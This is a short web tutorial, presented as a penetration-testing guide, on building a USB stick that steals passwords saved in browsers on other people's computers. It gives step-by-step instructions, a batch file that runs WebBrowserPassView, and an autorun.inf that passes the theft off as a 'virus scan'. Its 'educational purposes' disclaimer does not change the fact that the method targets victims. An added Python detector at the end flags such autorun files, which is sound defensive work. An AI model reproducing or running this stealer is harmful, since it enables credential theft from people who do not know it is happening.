Guide For Penetration Testing for USB Blocking
Windows can store passwords, and so can modern browsers. While this feature is convenient for users, it has become a big security risk for organizations. Browsers store passwords on a daily basis for services such as MSN Messenger, Yahoo and Facebook, because most people lack time and ask their browsers to save their passwords. Many tools are available to recover saved passwords, so in this article I will explain how to make a USB password stealer and steal saved passwords.
Just to explain the concept, we are going to collect some password-stealing tools that are freely available on the internet and capable of stealing the passwords stored in browsers or other Windows files.
Then, we create a batch program that will execute these combined programs and store the stolen usernames and passwords in a text file.
To further spice up the penetration testing demonstration, we will also make this batch file execute as an auto-run for the USB stick, effectively stealing the passwords as we plug it in.
***********************************
Things You Will Need:
1) Download the WebBrowserPassView ZIP file from the given link, then insert your pen drive into your computer and format it as NTFS (Quick Format).
2) In the next step, create a new folder on your pen drive, name the folder “USB”, and extract the WebBrowserPassView ZIP file into the USB folder.
3) Then open Notepad, copy the script given below, and save the file as
USB Driver.bat
@echo off
cls
start \usb\WebBrowserPassView.exe /shtml 1.html
4) Open Notepad again, copy the script below, and this time save the file as
Autorun.inf
[autorun] open=usbdriver.bat
Action=Perform a virus Scan
5) Now move both files, Autorun.inf and USBdriver.bat, to your pen drive.
The tricky thing is that whenever you insert the USB drive into someone’s computer, it will ask you to perform a virus scan. Once you select yes, all the passwords saved on the victim’s computer will be saved to your pen drive.
Open the pen drive and double-click on USBDriver.bat to see all the passwords.
This article is just for educational purposes. So, whenever you suspect someone is doing the same thing to you, stop him/her immediately. Hope you like the article; share it with others also.
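A defender-side check for the technique above, as an added example that is not part of the original article: it parses an autorun.inf found on removable media and flags the two traits this page relies on, a launch key that points at a script or executable and an Action= label posing as a security task. The function name, the extension list, the lure keywords and the sample files are assumptions constructed for illustration.

```python
import re

# Assumed lists for illustration; tune them for your environment.
RISKY_TARGET = re.compile(r"\.(bat|cmd|exe|com|scr|vbs|js|ps1|lnk)(?=$|[\s\"])", re.I)
LURE_WORDS = ("scan", "virus", "antivirus", "security", "update", "driver")
LAUNCH_KEYS = ("open", "shellexecute")
SHELL_VERB = re.compile(r"shell\\[^\\]+\\command")

def audit_autorun(text):
    """Return (rule, key, value) findings for the [autorun] section of an autorun.inf."""
    findings, section = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):      # skip blanks and comments
            continue
        header = re.match(r"\[(.+?)\]\s*(.*)$", line)
        if header:
            section = header.group(1).strip().lower()
            line = header.group(2)                 # tolerate a key on the header line
            if not line:
                continue
        if section != "autorun" or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        key = key.lower()
        if key in LAUNCH_KEYS or SHELL_VERB.fullmatch(key):
            # Any program or script started from removable media is worth a look.
            if RISKY_TARGET.search(value):
                findings.append(("launches-program", key, value))
        elif key == "action" and any(w in value.lower() for w in LURE_WORDS):
            # AutoPlay shows this text to the user; security-themed wording is a lure.
            findings.append(("lure-label", key, value))
    return findings

# Constructed samples: one mirrors the file described above, one is a harmless label/icon file.
SAMPLE_SUSPICIOUS = "[autorun]\nopen=usbdriver.bat\nAction=Perform a virus Scan\n"
SAMPLE_BENIGN = "[autorun]\nicon=logo.ico\nlabel=Backup Disk\n"

if __name__ == "__main__":
    for name, body in (("suspicious", SAMPLE_SUSPICIOUS), ("benign", SAMPLE_BENIGN)):
        print(name, audit_autorun(body))
```

Run it against the autorun.inf of any removable volume during triage or at insertion time; a finding on either rule is reason to quarantine the drive before anyone clicks the AutoPlay prompt.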
**********************************************